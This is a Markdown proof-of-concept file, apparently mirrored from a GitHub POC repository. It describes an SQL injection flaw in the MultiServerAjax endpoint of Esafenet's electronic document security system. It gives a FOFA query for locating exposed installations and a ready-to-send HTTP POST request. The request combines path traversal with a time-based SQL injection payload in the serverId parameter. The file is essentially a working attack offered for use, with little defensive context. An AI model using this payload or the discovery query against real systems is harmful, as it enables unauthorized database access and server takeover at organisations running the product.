mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
22 lines
710 B
Markdown
22 lines
710 B
Markdown
# 亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞
|
||
|
||
亿某通电子文档安全管理系统` MultiServerAjax`接口的`serverId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
app="亿赛通-DLP"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
POST /CDGServer3/js/../MultiServerAjax HTTP/1.1
|
||
Host: your-ip
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||
Content-Type: application/x-www-form-urlencoded
|
||
|
||
command=delServer&serverId=-1'waitfor delay '0:0:5'--
|
||
```
|
||
|